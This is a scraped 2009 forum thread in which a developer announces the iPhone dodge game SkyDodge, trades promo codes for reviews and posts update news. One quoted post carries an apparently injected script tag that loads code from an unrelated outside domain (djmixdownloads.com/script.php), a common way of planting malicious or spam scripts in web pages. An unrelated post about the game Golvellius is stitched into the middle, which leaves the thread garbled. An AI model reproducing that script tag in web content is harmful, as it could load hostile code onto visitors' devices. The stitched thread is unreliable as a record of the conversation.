Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: SkyDodge is out - Dodge Game on Your iPhone/iPod Touch

Thumbs up SkyDodge is out - Dodge Game on Your iPhone/iPod Touch
    Hi Everyone!

I'm pleased to announce that my first iPhone game is out!

Use your iPhone accelerometer to control the plane and avoid any obstacles in the sky. It sounds easy, but as more and more obstacles appear with increasing speed, you will need rapid reaction to avoid any collision!

iTunes Download Link

You can obtain several items by flighting through item bubbles or coins, which can be used for either enhance your plane or increase your score.

If anyone can show your review of other App, I'm willing to give you a promo code to review this game. Just post here and I will check it out. Thanks!

MarsApp Team
    SkyDodge.com (SkyDodge) on Twitter :apple:
    Last edited by StealthBravo; 2009-09-19 at 06:00 PM. Reason: no non-itunes links
    My iPhone Apps:
    SkyDodge | TaskCard | iTweetSong

Online Score feature added and will submit today. Hope everyone like it!
    My iPhone Apps:

Quote Originally Posted by TammyWal22 View Post
    Hi Everyone!

I'm pleased to announce that my first iPhone game is out!

Use your iPhone accelerometer to control the plane and avoid any obstacles in the sky. It sounds easy, but as more and more obstacles appear with increasing speed, you will need rapid reaction to avoid any collision!

iTunes Download Link

You can obtain several items by flighting through item bubbles or coins, which can be used for either enhance your plane or increase your score.

If anyone can show your review of other App, I'm willing to give you a promo code to review this game. Just post here and I will check it out. Thanks!

MarsApp Team
    SkyDodge.com (SkyDodge) on Twitter :apple:<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    Golvellius: Valley of Doom has arrived for the iPhone. This 1987 RPG was originally released for the Japanese MSX home computer system and later brought to the Sega Master System.

The iPhone version of the game was ported by DotEmu with iPhone UI modifications as well as an intelligent save system.

Here's a gameplay video showing the controls which are virtual d-pad based.

Quote Originally Posted by digitaldream View Post
    Golvellius: Valley of Doom has arrived for the iPhone. This 1987 RPG was originally released for the Japanese MSX home computer system and later brought to the Sega Master System.

The iPhone version of the game was ported by DotEmu with iPhone UI modifications as well as an intelligent save system.

Here's a gameplay video showing the controls which are virtual d-pad based.
    What do you mean?
    My iPhone Apps:

I'm so happy to announce that SkyDodge has just been featured in What's Hot section of AppStore!

The new version has also been submitted including OpenFeint enabled with Global High Score and Achievements.

So get it now if you like to make challenge!
    My iPhone Apps: